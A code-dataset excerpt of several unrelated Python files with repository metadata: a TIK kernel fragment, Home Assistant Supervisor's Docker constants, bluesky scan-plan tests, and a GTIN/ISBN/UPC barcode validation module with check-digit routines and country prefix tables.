recur_total_core: physical cores in recursion.
recur_start_address: start address in recursion
"""
tik_instance = obj.tik_instance
cond, gap0, gap1 = obj.recur_cond[0], obj.recur_gap_0[0], obj.recur_gap_1[0]
loop0, loop1, in_vol = obj.recur_loop_0[0], obj.recur_loop_1[0], obj.recur_in_vol[0]
max_num = obj.tik_instance.Scalar("int32", name="max_num_")
def _main(processed, loop, block_index):
src_ub = 0
dst_ub = 0
dst_gm = obj.recur_start_address[0]
src_gm = 0
axis = 0
with tik_instance.for_range(0, loop) as idx:
sum_core = processed + block_index * loop + idx
dst_gm += sum_core / cond * gap0 + sum_core % cond * gap1
src_gm += sum_core * in_vol
_recursion(obj, axis, dst_gm, src_gm, src_ub, dst_ub, max_num, False)
with tik_instance.if_scope(blk_idx <= obj.recur_div_core[0]):
pro = 0
_main(pro, loop0, blk_idx)
with tik_instance.if_scope(tik.all(blk_idx > obj.recur_div_core[0],
blk_idx < obj.recur_total_core[0])):
pro = (obj.recur_div_core[0] + 1) * loop0
blk_idx = blk_idx - obj.recur_div_core[0] - 1
_main(pro, loop1, blk_idx)
def not_align_compute(obj, blk_idx):
# =================
# circulation layer
# =================
_circulation_compute(obj, blk_idx)
# =================
# recursion layer
# =================
_recursion_compute(obj, blk_idx)
| [
"[email protected]"
] | |
480f230a8f4d7f2d2cb4b1c639c05909e1bd21f2 | e90bf4b372da78ceec15282d060b48d18ba8d4e9 | /supervisor/docker/const.py | f8e3edbeb75efcfbbb06b5df64772e6a083b2986 | [
"Apache-2.0"
] | permissive | home-assistant/supervisor | 67f2e1755ff5fbf7cf2084351e1c32c6995274e0 | 4838b280adafed0997f32e021274b531178386cd | refs/heads/main | 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 | Apache-2.0 | 2023-09-14T17:11:27 | 2017-03-14T08:54:15 | Python | UTF-8 | Python | false | false | 2,030 | py | """Docker constants."""
from enum import Enum
from docker.types import Mount
from ..const import MACHINE_ID
class Capabilities(str, Enum):
"""Linux Capabilities."""
BPF = "BPF"
DAC_READ_SEARCH = "DAC_READ_SEARCH"
IPC_LOCK = "IPC_LOCK"
NET_ADMIN = "NET_ADMIN"
NET_RAW = "NET_RAW"
PERFMON = "PERFMON"
SYS_ADMIN = "SYS_ADMIN"
SYS_MODULE = "SYS_MODULE"
SYS_NICE = "SYS_NICE"
SYS_PTRACE = "SYS_PTRACE"
SYS_RAWIO = "SYS_RAWIO"
SYS_RESOURCE = "SYS_RESOURCE"
SYS_TIME = "SYS_TIME"
class ContainerState(str, Enum):
"""State of supervisor managed docker container."""
FAILED = "failed"
HEALTHY = "healthy"
RUNNING = "running"
STOPPED = "stopped"
UNHEALTHY = "unhealthy"
UNKNOWN = "unknown"
class RestartPolicy(str, Enum):
"""Restart policy of container."""
NO = "no"
ON_FAILURE = "on-failure"
UNLESS_STOPPED = "unless-stopped"
ALWAYS = "always"
class MountType(str, Enum):
"""Mount type."""
BIND = "bind"
VOLUME = "volume"
TMPFS = "tmpfs"
NPIPE = "npipe"
class PropagationMode(str, Enum):
"""Propagataion mode, only for bind type mounts."""
PRIVATE = "private"
SHARED = "shared"
SLAVE = "slave"
RPRIVATE = "rprivate"
RSHARED = "rshared"
RSLAVE = "rslave"
ENV_TIME = "TZ"
ENV_TOKEN = "SUPERVISOR_TOKEN"
ENV_TOKEN_OLD = "HASSIO_TOKEN"
LABEL_MANAGED = "supervisor_managed"
MOUNT_DBUS = Mount(
type=MountType.BIND.value, source="/run/dbus", target="/run/dbus", read_only=True
)
MOUNT_DEV = Mount(
type=MountType.BIND.value, source="/dev", target="/dev", read_only=True
)
MOUNT_DOCKER = Mount(
type=MountType.BIND.value,
source="/run/docker.sock",
target="/run/docker.sock",
read_only=True,
)
MOUNT_MACHINE_ID = Mount(
type=MountType.BIND.value,
source=MACHINE_ID.as_posix(),
target=MACHINE_ID.as_posix(),
read_only=True,
)
MOUNT_UDEV = Mount(
type=MountType.BIND.value, source="/run/udev", target="/run/udev", read_only=True
)
| [
"[email protected]"
] | |
a90e9370b12a22d95dfd74afb1de671b312d4041 | 6471f95e6a193b0c018d81a2c4e8a518f7ec35d7 | /tests/test_wrappers.py | 04a0837a4d619f644b026ee4c60fc82aa4fe1eee | [
"BSD-3-Clause"
] | permissive | Billingegroup/bluesky_scanplans | 5b297e4874b2e57d44a5cc091a2a87be87856503 | f865da9712bb91dceee73d4aea61f9b6c4b2c9ef | refs/heads/master | 2021-06-30T18:08:37.553268 | 2021-05-20T18:25:31 | 2021-05-20T18:25:31 | 234,350,238 | 0 | 3 | BSD-3-Clause | 2021-05-20T17:11:51 | 2020-01-16T15:27:35 | Jupyter Notebook | UTF-8 | Python | false | false | 755 | py | import bluesky.plan_stubs as bps
import bluesky.plans as bp
import bluesky.simulators as sim
import xpdsim.movers as movers
import scanplans.wrapper as helper
def test_wrapper_count():
trigger_and_read = helper.shutter_wrapper(bps.trigger_and_read, movers.shctl1, 0, 100, 0)
one_shot = helper.take_reading_wrapper(bps.one_shot, trigger_and_read)
plan = bp.count([movers.cs700], per_shot=one_shot)
sim.summarize_plan(plan)
def test_grid_scan():
trigger_and_read = helper.shutter_wrapper(bps.trigger_and_read, movers.shctl1, 0, 100, 0)
one_nd_step = helper.take_reading_wrapper(bps.one_nd_step, trigger_and_read)
plan = bp.grid_scan([movers.cs700], movers.cs700, -1, 1, 3, per_step=one_nd_step)
sim.summarize_plan(plan)
| [
"[email protected]"
] | |
130afc27743998b2f8782f773138e810728f701f | 680371c067ae3bbab958d6224b405630eaef8e31 | /python_BTL_BitTorrent-5.3-GPL/BTL/canonical/gtin.py | c43182a6c08aae0b0bcd64cbecb1cc71e2c07253 | [
"MIT"
] | permissive | galaxy001/libtorrent | 18ede4a2e1c610089a082683ec4b33da0625837a | 6a17e8ebfb668a8965fbf8a53083ec7bd4339847 | refs/heads/master | 2021-01-10T11:13:44.730732 | 2017-08-26T19:58:08 | 2017-08-26T19:58:08 | 48,836,473 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 90,803 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
This is a Python module for handling Global Trade Item Numbers (GTINs)
and includes check digit verification and structural verification (has
to look like a GTIN). GTIN is a superset of the older UPC/UCC-12
(12-digit), EAN/UCC-8 (8-digit) and EAN-13/UCC-13 (13-digit) codes,
and consists of fourteen digits, zero-filled on the left. The final
digit is a check digit. They are sometimes written out in full in
EAN/UCC/ITF-14 form, optionally with an auxiliary quantity code as a
second UPC-style code.
This module also handles UPC E/UPC-8 8-digit zero-suppressed
identifiers; use GTIN_from_UPC8 to decompress these and GTIN_to_UPC8
to produce them, or use the UPC8 class.
This module also handles 10- and 13-digit International Standard Book
Numbers (ISBN-10 and ISBN-13 respectively, collectively ISBNs) and the
older 9-digit Standard Book Numbers (SBNs); use GTIN_from_ISBN to
decode these and GTIN_to_ISBN to produce them, or use the ISBN class.
This module also handles 10- and 13-digit Internation Standard Music
Numbers (ISMNs); use GTIN_from_ISMN to decode these and GTIN_to_ISMN
to produce them, or use the ISMN class.
This module also handles 8-digit International Standard Serial Numbers
(ISSNs); use GTIN_from_ISSN to decode these and GTIN_to_ISSN to
produce them, or use the ISSN class.
This module does not calculate UPC/UCC-12 price check digits, nor does
it handle auxiliary bar codes for quantities, issue numbers (ISSN) or
other purposes.
The same check digit algorithm used for GTIN (checkStandardModulo) is
also used for 18-digit Serial Shipping Container Codes (SSCCs),
17-digit Shipment ID/Bill of Lading numbers (BoLs), 10-digit
International Standard Music Numbers (ISMNs), and 13-digit Global
Location Numbers (GLNs).
Tha same check character algorithm used for ISBN (checkPositionModulo)
is also used for 8-digit International Standard Serial Numbers
(ISSNs).
NOTE: EAN.UCC is now known as GS1
FIXME: The Serial Item and Contribution Identifier (SICI) code,
ANSI/NISO Z39.56, and corresponding SISAC barcode format are not yet
handled by this module; they embed ISSN data but also include the year
and month of publication, and the issue number.
FIXME: This module does not handle the more advanced UCC/EAN-128
structure which encodes one or more pieces of typed numeric or
alphanumeric information.
FIXME: This module does not handle Global Location Numbers (GLNs) or
the older EAN Location Numbers; these are however structurally
identical to GTIN and so the same code works for both (note that in
practice the same number means different things depending on whether
it is used in a GTIN context or in a GLN context, but these contexts
are clearly distinguished.)
FIXME: NOTE THAT THE THIRTEEN-DIGIT ISMN AND THE CORRESPONDING 979-0
"MUSICLAND" PREFIX MAY NOT YET BE STANDARDIZED AS OF THIS WRITING.
'''
import re
import sys
import string
import time
def checkStandardModulo(base, digits, scale = 3):
'''
Return the standard modulo-BASE check digit integer for the given
integer sequence ("digits") where every other digit is multiplied
by the scale factor (three by default) while summing, and the
check digit is the complement of the modulo-BASE sum.
'''
isum = 0
for x in xrange(1, len(digits) + 1):
isum = (isum + ((x % 2) and scale or 1) * digits[-x]) % base
pass
return (base - isum) % base
def checkPositionModulo(base, digits):
'''
Return the position-scaled modulo-BASE check digit integer for the
given integer sequence ("digits") where each digit is multiplied
by its position plus one, and the check-digit is the complement of
the modulo-BASE sum.
Note that rightmost digit in the sequence is multiplied by two,
the next to the left by three, etc.
'''
isum = 0
for x in xrange(1, len(digits) + 1):
isum += ((x + 1) * digits[-x]) % base
pass
return (base - isum) % base
class GTIN(object):
'''
Global Trade Item Numbers (GTIN)
Structure: 14 decimal digits with the last digit serving as a
check digit.
Valid GTIN formats (leading zeroes may be omitted on input):
UPC/UCC-12:
00hhhhhhiiiiic
00hhhhhhhiiiic
00hhhhhhhhiiic
00hhhhhhhhhiic
EAN/UCC-13:
0nnnnnnnnnnnnc
EAN/UCC-14:
pnnnnnnnnnnnnc
EAN/UCC-8:
000000nnnnnnnc
Key: p - indicator digit (used e.g. in layered packaging)
h - UCC company prefix
i - item reference number
n - EAN/UCC company prefix and reference number
c - check digit
NOTE: EAN/UCC-8 is for use only outside the US and Canada, and is
not to be confused with 8-digit UPC E/UPC-8, which is a compressed
representation for UPC/UCC-12.
NOTE: 8-digit UPC E/UPC-8 codes should be converted to UPC/UCC-12
(UPC A) format before zero-filling and use as GTINs.
The check digits are calculated by the standard modulo algorithm
where every other digit is tripled while summing.
NOTE: GTINs in the invalid/unassigned Bookland (ISBN) range
p9786nnnnnnnnc are disallowed by this code and raise
a ValueError.
'''
# FIXME: we permit non-zero-filled forms.
gtin_re = re.compile(
r'''
\A
(?:
(?:
(?:
(?:
(?:EAN|UPC|U[.]P[.]C[.]|(?:EAN[-./]?)UCC)
(?:[- ]?12)?
|
(?:UPC|U[.]P[.]C[.])[ ]?A
)
:?
[ ]?
)?
(?P<upc>\d{11})
)
|
(?:
(?:
(?:EAN|JAN|IAN|DUN|(?:EAN[-./]?)UCC)
(?:[- ]?13)?
:?
[ ]?
)?
(?P<ean>\d{12})
)
|
(?:
(?:
(?:EAN|ITF|(?:EAN[-./]?)UCC)
(?:[- ]?14)?
:?
[ ]?
)?
(?P<gtin>\d{13})
)
|
(?:
(?:
(?:EAN|(?:EAN[-./]?)UCC)
(?:[- ]?8)?
:?
[ ]?
)?
(?P<ean8>\d{7})
)
)
(?P<gtincheck>\d)
\Z
''',
re.VERBOSE | re.UNICODE | re.IGNORECASE)
# longest match wins
systemcodes = {
## FIXME: is this really always correct? Need to check UCC registration info...
'00': 'USA & Canada',
'00000': 'EAN/UCC-8',
'000000': 'reserved for internal use',
'000002': 'reserved for internal use',
'0001': 'reserved for internal use',
'0002': 'reserved for internal use',
'0003': 'reserved for internal use',
'0004': 'reserved for internal use',
'0005': 'reserved for internal use',
'0006': 'reserved for internal use',
'0007': 'reserved for internal use',
'01': 'USA & Canada (formerly reserved)',
'02': 'reserved for local use (store/warehouse); typically used for random-weight items',
'03': 'USA & Canada (pharmaceuticals)',
'04': 'reserved for local use (store/warehouse); typically used by retailers for in-store marking',
'05': 'Coupons',
'06': 'USA & Canada',
'07': 'USA & Canada',
'08': 'USA & Canada (formerly reserved)',
'09': 'USA & Canada (formerly reserved)',
'10': 'USA & Canada',
'11': 'USA & Canada',
'12': 'USA & Canada',
'13': 'USA & Canada',
'14': 'reserved (?)',
'15': 'reserved (?)',
'16': 'reserved (?)',
'17': 'reserved (?)',
'18': 'reserved (?)',
'19': 'reserved (?)',
'2': 'reserved for local use (store/warehouse)',
'30': 'France',
'31': 'France',
'32': 'France',
'33': 'France',
'34': 'France',
'35': 'France',
'36': 'France',
'37': 'France',
'380': 'Bulgaria',
'383': 'Slovenija',
'385': 'Croatia',
'387': 'BIH (Bosnia-Herzegovina)',
'40': 'Germany',
'41': 'Germany',
'42': 'Germany',
'43': 'Germany',
'440': 'Germany',
'45': 'Japan',
'46': 'Russian Federation',
'470': 'Kyrgyzstan',
'471': 'Taiwan',
'474': 'Estonia',
'475': 'Latvia',
'476': 'Azerbaijan',
'477': 'Lithuania',
'478': 'Uzbekistan',
'479': 'Sri Lanka',
'480': 'Philippines',
'481': 'Belarus',
'482': 'Ukraine',
'484': 'Moldova',
'485': 'Armenia',
'486': 'Georgia',
'487': 'Kazakhstan',
'489': 'Hong Kong',
'49': 'Japan',
'50': 'UK',
'520': 'Greece',
'528': 'Lebanon',
'529': 'Cyprus',
'531': 'Macedonia',
'535': 'Malta',
'539': 'Ireland',
'54': 'Belgium & Luxembourg',
'560': 'Portugal',
'569': 'Iceland',
'57': 'Denmark',
'590': 'Poland',
'594': 'Romania',
'599': 'Hungary',
'600': 'South Africa',
'601': 'South Africa',
'608': 'Bahrain',
'609': 'Mauritius',
'611': 'Morocco',
'613': 'Algeria',
'619': 'Tunisia',
'621': 'Syria',
'622': 'Egypt',
'624': 'Libya',
'625': 'Jordan',
'626': 'Iran',
'627': 'Kuwait',
'628': 'Saudi Arabia',
'629': 'Emirates',
'64': 'Finland',
'690': 'China',
'691': 'China',
'692': 'China',
'693': 'China',
'694': 'China',
'695': 'China',
'70': 'Norway',
'729': 'Israel',
'73': 'Sweden',
'740': 'Guatemala',
'741': 'El Salvador',
'742': 'Honduras',
'744': 'Costa Rica',
'745': 'Panama',
'746': 'Republica Dominicana',
'750': 'Mexico',
'754': 'Canada',
'755': 'Canada',
'759': 'Venezuela',
'76': 'Schweiz, Suisse, Svizzera',
'770': 'Colombia',
'773': 'Uruguay',
'775': 'Peru',
'777': 'Bolivia',
'779': 'Argentina',
'780': 'Chile',
'784': 'Paraguay',
'786': 'Ecuador',
'789': 'Brasil',
'790': 'Brasil',
'80': 'Italy',
'81': 'Italy',
'82': 'Italy',
'83': 'Italy',
'84': 'Spain',
'850': 'Cuba',
'858': 'Slovakia',
'859': 'Czech',
'860': 'YU (Serbia & Montenegro)',
'865': 'Mongolia',
'867': 'North Korea',
'869': 'Turkey',
'87': 'Netherlands',
'880': 'South Korea',
'884': 'Cambodia',
'885': 'Thailand',
'888': 'Singapore',
'890': 'India',
'893': 'Vietnam',
'899': 'Indonesia',
'90': 'Austria',
'91': 'Austria',
'93': 'Australia',
'94': 'New Zealand',
'950': 'Head Office',
'955': 'Malaysia',
'958': 'Macau',
'970': 'reserved (?)',
'971': 'reserved (?)',
'972': 'reserved (?)',
'973': 'reserved (?)',
'974': 'reserved (?)',
'975': 'reserved (?)',
'976': 'reserved (?)',
'977': 'Serial publications (ISSN)',
'978': 'Bookland (ISBN)',
'9780': 'Bookland (ISBN): English speaking area: Australia, Canada (E.), Gibraltar, Ireland, (Namibia), New Zealand, Puerto Rico, South Africa, Swaziland, UK, USA, Zimbabwe',
'9781': 'Bookland (ISBN): English speaking area: Australia, Canada (E.), Gibraltar, Ireland, (Namibia), New Zealand, Puerto Rico, South Africa, Swaziland, UK, USA, Zimbabwe',
'9782': 'Bookland (ISBN): French speaking area: France, Belgium (Fr. sp.), Canada (Fr. sp.), Luxembourg, Switzerland (Fr. sp.)',
'9783': 'Bookland (ISBN): German speaking area: Austria, Germany, Switzerland (Germ. sp.)',
'9784': 'Bookland (ISBN): Japan',
'9785': 'Bookland (ISBN): Russian Federation (Azerbaijan, Tajikistan, Turkmenistan, Uzbekistan, Armenia, Belarus, Estonia, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Lithuania, Moldova, Ukraine)',
'9786': 'Bookland (ISBN): UNDEFINED/INVALID',
'9787': 'Bookland (ISBN): China, People\'s Republic',
'97880': 'Bookland (ISBN): Czech Republic; Slovakia',
'97881': 'Bookland (ISBN): India',
'97882': 'Bookland (ISBN): Norway',
'97883': 'Bookland (ISBN): Poland',
'97884': 'Bookland (ISBN): Spain',
'97885': 'Bookland (ISBN): Brazil',
'97886': 'Bookland (ISBN): Serbia and Montenegro: Bosnia and Herzegovina, Croatia, Macedonia, Slovenia',
'97887': 'Bookland (ISBN): Denmark',
'97888': 'Bookland (ISBN): Italian speaking area: Italy, Switzerland (It. sp.)',
'97889': 'Bookland (ISBN): Korea',
'97890': 'Bookland (ISBN): Netherlands: Netherlands, Belgium (Flemish)',
'97891': 'Bookland (ISBN): Sweden',
'97892': 'Bookland (ISBN): International Publishers (Unesco, EU); European Community Organizations',
'97893': 'Bookland (ISBN): India',
'978950': 'Bookland (ISBN): Argentina',
'978951': 'Bookland (ISBN): Finland',
'978952': 'Bookland (ISBN): Finland',
'978953': 'Bookland (ISBN): Croatia',
'978954': 'Bookland (ISBN): Bulgaria',
'978955': 'Bookland (ISBN): Sri Lanka',
'978956': 'Bookland (ISBN): Chile',
'978957': 'Bookland (ISBN): Taiwan, China',
'978958': 'Bookland (ISBN): Colombia',
'978959': 'Bookland (ISBN): Cuba',
'978960': 'Bookland (ISBN): Greece',
'978961': 'Bookland (ISBN): Slovenia',
'978962': 'Bookland (ISBN): Hong Kong',
'978963': 'Bookland (ISBN): Hungary',
'978964': 'Bookland (ISBN): Iran',
'978965': 'Bookland (ISBN): Israel',
'978966': 'Bookland (ISBN): Ukraine',
'978967': 'Bookland (ISBN): Malaysia',
'978968': 'Bookland (ISBN): Mexico',
'978969': 'Bookland (ISBN): Pakistan',
'978970': 'Bookland (ISBN): Mexico',
'978971': 'Bookland (ISBN): Philippines',
'978972': 'Bookland (ISBN): Portugal',
'978973': 'Bookland (ISBN): Romania',
'978974': 'Bookland (ISBN): Thailand',
'978975': 'Bookland (ISBN): Turkey',
'978976': 'Bookland (ISBN): Caribbean Community: Antigua [AG], Bahamas [BS], Barbados [BB], Belize [BZ], Cayman Islands [KY], Dominica [DM], Grenada [GD], Guyana [GY], Jamaica [JM], Montserrat [MS], St. Kitts-Nevis [KN], St. Lucia [LC], St. Vincent and the Grenadines [VC], Trinidad and Tobago [TT], Virgin Islands (Br) [VG]',
'978977': 'Bookland (ISBN): Egypt',
'978978': 'Bookland (ISBN): Nigeria',
'978979': 'Bookland (ISBN): Indonesia',
'978980': 'Bookland (ISBN): Venezuela',
'978981': 'Bookland (ISBN): Singapore',
'978982': 'Bookland (ISBN): South Pacific: Cook Islands [CK], Fiji [FJ], Kiribati [KI], Marshall Islands [MH], Micronesia (Federal States of) [FM], Nauru [NR], New Caledonia [NC], Niue [NU], Palau [PW], Solomon Islands [SB], Tokelau [TK], Tonga [TO], Tuvalu [TV], Vanuatu [VU], Western Samoa [WS]',
'978983': 'Bookland (ISBN): Malaysia',
'978984': 'Bookland (ISBN): Bangladesh',
'978985': 'Bookland (ISBN): Belarus',
'978986': 'Bookland (ISBN): Taiwan, China',
'978987': 'Bookland (ISBN): Argentina',
'978988': 'Bookland (ISBN): Hong Kong',
'978989': 'Bookland (ISBN): Portugal',
'9789944': 'Bookland (ISBN): Turkey',
'9789945': 'Bookland (ISBN): Dominican Republic',
'9789946': 'Bookland (ISBN): Korea, P.D.R.',
'9789947': 'Bookland (ISBN): Algeria',
'9789948': 'Bookland (ISBN): United Arab Emirates',
'9789949': 'Bookland (ISBN): Estonia',
'9789950': 'Bookland (ISBN): Palestine',
'9789951': 'Bookland (ISBN): Kosova',
'9789952': 'Bookland (ISBN): Azerbaijan',
'9789953': 'Bookland (ISBN): Lebanon',
'9789954': 'Bookland (ISBN): Morocco',
'9789955': 'Bookland (ISBN): Lithuania',
'9789956': 'Bookland (ISBN): Cameroon',
'9789957': 'Bookland (ISBN): Jordan',
'9789958': 'Bookland (ISBN): Bosnia and Herzegovina',
'9789959': 'Bookland (ISBN): Libya',
'9789960': 'Bookland (ISBN): Saudi Arabia',
'9789961': 'Bookland (ISBN): Algeria',
'9789962': 'Bookland (ISBN): Panama',
'9789963': 'Bookland (ISBN): Cyprus',
'9789964': 'Bookland (ISBN): Ghana',
'9789965': 'Bookland (ISBN): Kazakhstan',
'9789966': 'Bookland (ISBN): Kenya',
'9789967': 'Bookland (ISBN): Kyrgyzstan',
'9789968': 'Bookland (ISBN): Costa Rica',
'9789970': 'Bookland (ISBN): Uganda',
'9789971': 'Bookland (ISBN): Singapore',
'9789972': 'Bookland (ISBN): Peru',
'9789973': 'Bookland (ISBN): Tunisia',
'9789974': 'Bookland (ISBN): Uruguay',
'9789975': 'Bookland (ISBN): Moldova',
'9789976': 'Bookland (ISBN): Tanzania',
'9789977': 'Bookland (ISBN): Costa Rica',
'9789978': 'Bookland (ISBN): Ecuador',
'9789979': 'Bookland (ISBN): Iceland',
'9789980': 'Bookland (ISBN): Papua New Guinea',
'9789981': 'Bookland (ISBN): Morocco',
'9789982': 'Bookland (ISBN): Zambia',
'9789983': 'Bookland (ISBN): Gambia',
'9789984': 'Bookland (ISBN): Latvia',
'9789985': 'Bookland (ISBN): Estonia',
'9789986': 'Bookland (ISBN): Lithuania',
'9789987': 'Bookland (ISBN): Tanzania',
'9789988': 'Bookland (ISBN): Ghana',
'9789989': 'Bookland (ISBN): Macedonia',
'97899901': 'Bookland (ISBN): Bahrain',
'97899902': 'Bookland (ISBN): Gabon',
'97899903': 'Bookland (ISBN): Mauritius',
'97899904': 'Bookland (ISBN): Netherlands Antilles; Aruba, Neth. Ant.',
'97899905': 'Bookland (ISBN): Bolivia',
'97899906': 'Bookland (ISBN): Kuwait',
'97899908': 'Bookland (ISBN): Malawi',
'97899909': 'Bookland (ISBN): Malta',
'97899910': 'Bookland (ISBN): Sierra Leone',
'97899911': 'Bookland (ISBN): Lesotho',
'97899912': 'Bookland (ISBN): Botswana',
'97899913': 'Bookland (ISBN): Andorra',
'97899914': 'Bookland (ISBN): Suriname',
'97899915': 'Bookland (ISBN): Maldives',
'97899916': 'Bookland (ISBN): Namibia',
'97899917': 'Bookland (ISBN): Brunei Darussalam',
'97899918': 'Bookland (ISBN): Faroe Islands',
'97899919': 'Bookland (ISBN): Benin',
'97899920': 'Bookland (ISBN): Andorra',
'97899921': 'Bookland (ISBN): Qatar',
'97899922': 'Bookland (ISBN): Guatemala',
'97899923': 'Bookland (ISBN): El Salvador',
'97899924': 'Bookland (ISBN): Nicaragua',
'97899925': 'Bookland (ISBN): Paraguay',
'97899926': 'Bookland (ISBN): Honduras',
'97899927': 'Bookland (ISBN): Albania',
'97899928': 'Bookland (ISBN): Georgia',
'97899929': 'Bookland (ISBN): Mongolia',
'97899930': 'Bookland (ISBN): Armenia',
'97899931': 'Bookland (ISBN): Seychelles',
'97899932': 'Bookland (ISBN): Malta',
'97899933': 'Bookland (ISBN): Nepal',
'97899934': 'Bookland (ISBN): Dominican Republic',
'97899935': 'Bookland (ISBN): Haiti',
'97899936': 'Bookland (ISBN): Bhutan',
'97899937': 'Bookland (ISBN): Macau',
'97899938': 'Bookland (ISBN): Srpska',
'97899939': 'Bookland (ISBN): Guatemala',
'97899940': 'Bookland (ISBN): Georgia',
'97899941': 'Bookland (ISBN): Armenia',
'97899942': 'Bookland (ISBN): Sudan',
'97899943': 'Bookland (ISBN): Albania',
'97899944': 'Bookland (ISBN): Ethiopia',
'97899945': 'Bookland (ISBN): Namibia',
'97899946': 'Bookland (ISBN): Nepal',
'97899947': 'Bookland (ISBN): Tajikistan',
'97899948': 'Bookland (ISBN): Eritrea',
'97899949': 'Bookland (ISBN): Mauritius',
'97899950': 'Bookland (ISBN): Cambodia',
'97899951': 'Bookland (ISBN): Congo',
'97899952': 'Bookland (ISBN): Mali',
'97899953': 'Bookland (ISBN): Paraguay',
'979': 'Bookland (ISBN)',
'9790': 'Musicland (ISMN)',
'980': 'Refund receipts',
'981': 'Common Currency Coupons',
'982': 'Common Currency Coupons',
'99': 'Coupons',
}
packcodes = {
'0': None,
'1': 'conventionally more than individual and less than inner pack (primary code)',
'2': 'conventionally more than individual and less than inner pack (alternate code)',
'3': 'conventionally an inner pack (primary code)',
'4': 'conventionally an inner pack (alternate code)',
'5': 'conventionally a shipping container or carton (primary code)',
'6': 'conventionally a shipping container or carton (alternate code)',
'7': 'conventionally a shipping pallet',
'8': 'code reserved for future use',
'9': 'variable quantity content',
}
def __init__(self, s, public = True, autocorrect = False):
'''
Initialize a GTIN from a string ("s"); set the optional flag
public = False if this GTIN is being used in an internal
context where local use codes are allowed.. Set the optional
flag autocorrect = True to replace the supplied check digit
with the correct one rather than raising an exception when the
check digit is not valid.
Canonical forms (input and output):
xxxxxxxxxxxxxy
Short forms (input only):
xxxxxxxxxxxy
xxxxxxxxxxxxy
xxxxxxxy
Where x is a decimal digit and y is a decimal check
digit. Whitespace and hyphens are stripped on input.
'''
if isinstance(s, GTIN): s = GTIN.__str__(s, short = True)
self.public = public
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match: raise ValueError('invalid literal for %s.%s(): %r' % (GTIN.__module__, GTIN.__name__, s))
self.gtin = (match.group('gtin') or match.group('ean') or match.group('upc') or match.group('ean8')).zfill(13)
self.gtincheck = match.group('gtincheck')
self.check(autocorrect = autocorrect)
self.info = None
self.pack = self.packcodes[self.gtin[0]]
if self.gtin[0] == '8':
raise ValueError('invalid literal for %s.%s(): %r (%s)' % (GTIN.__module__, GTIN.__name__, s, self.pack))
for i in xrange(1, len(self.gtin)):
key = self.gtin[1:][:-i]
if key == '9786':
raise ValueError('invalid literal for %s.%s(): %r (Bookland/ISBN reserved range)' % (GTIN.__module__, GTIN.__name__, s))
if self.systemcodes.has_key(key):
self.info = self.systemcodes[key]
break
if key[:5] == '00000' and self.systemcodes.has_key(key[5:]):
self.info = self.systemcodes[key[5:]]
break
pass
return
def __cmp__(self, gtin):
'''
Compare this GTIN with another object, returning -1 if the
other is greater than this one, 0 if the other is equal to
this one, or 1 if the other is less than this one.
'''
if not isinstance(gtin, GTIN):
raise TypeError('%s.%s.__cmp__(self, gtin) requires gtin to be a %s.%s, not a %s.%s' % (GTIN.__module__, GTIN.__name__, GTIN.__module__, GTIN.__name__, type(gtin).__module__, type(gtin).__name__))
return cmp(GTIN.__str__(self), GTIN.__str__(gtin))
def check(self, autocorrect = False):
'''
Verify the GTIN check digit. If it does not match, this raises
a ValueError. The optional parameter autocorrect = True
instead silently fixes the check digit.
Also verifies that a non-public GTIN is not used in a public context.
'''
digits = self.gtin
checkdigit = checkStandardModulo(10, [ int(ch, 10) for ch in digits ])
if autocorrect: self.gtincheck = str(checkdigit)
if int(self.gtincheck, 10) != checkdigit:
raise ValueError('invalid check digit for GTIN %s: %s' % (self, self.gtincheck))
# private codes (both EAN-8 and regular variants): restricted
# distribution, coupons, refund receipts, common currency
# coupons, packs thereof, and reserved ranges
if ((self.gtin[1:9] in ('00000970', '00000971', '00000972', '00000973', '00000974', '00000975', '00000976')
or self.gtin[1:8] in ('0000098', '0000099')
or self.gtin[1:7] in ('000000', '000002')
or self.gtin[1:5] in ('0001', '0002', '0003', '0004', '0005', '0006', '0007')
or self.gtin[1:4] in ('970', '971', '972', '973', '974', '975', '976')
or self.gtin[1:3] in ('02', '04', '05', '98', '99')
or self.gtin[1:2] in ('2',)
)
and self.public):
raise ValueError('non-public code in a public context for %s' % self)
pass
def __repr__(self): return '%s.%s(%r%s)' % (self.__class__.__module__, self.__class__.__name__, str(self), (not self.public) and ', public = False' or '')
def __str__(self, short = False):
'''
Stringify a GTIN; the optional flag short = True currently has no effect
'''
o = []
o.append(self.gtin)
o.append(self.gtincheck)
return ''.join(o)
pass
class EAN14(GTIN):
'''
Handle EAN/UCC-14 as a wrapper class around GTIN
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('gtin'): raise ValueError('invalid literal for %s.%s(): %r' % (EAN14.__module__, EAN14.__name__, s))
pass
GTIN.__init__(self, s, **kw)
pass
def __str__(self, short = False):
'''
Stringify an EAN/UCC-14; the optional flag short = True omits the EAN prefix
'''
o = []
if not short: o.append('EAN ')
o.append(self.gtin)
o.append(self.gtincheck)
return ''.join(o)
pass
class EAN13(GTIN):
'''
Handle EAN/JAN/IAN/DUN/EAN.UCC-13 as a wrapper class around GTIN
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('ean'): raise ValueError('invalid literal for %s.%s(): %r' % (EAN13.__module__, EAN13.__name__, s))
pass
GTIN.__init__(self, s, **kw)
if self.gtin[0] != '0':
raise ValueError('invalid literal for %s.%s(): %s' % (EAN13.__module__, EAN13.__name__, s))
pass
def __str__(self, short = False):
'''
Stringify an EAN/JAN/IAN/DUN/EAN.UCC-13; the optional flag short = True omits the EAN prefix
'''
o = []
if not short: o.append('EAN ')
o.append(self.gtin[1:])
o.append(self.gtincheck)
return ''.join(o)
pass
class UPC12(GTIN):
'''
Handle UPC A/EAN/UPC/EAN.UCC-12 as a wrapper class around GTIN
Not handled yet: price decoding for variable-quantity goods, e.g.
209060 301694
tare 0.010lb
net wt. 2.450lb
price/lb. $0.69/lb
total price $1.69
'''
def __init__(self, s, **kw):
if not isinstance(s, GTIN):
match = self.gtin_re.match(''.join(''.join(str(s).split()).split('-')))
if not match or not match.group('upc'): raise ValueError('invalid literal for %s.%s(): %r' % (UPC12.__module__, UPC12.__name__, s))
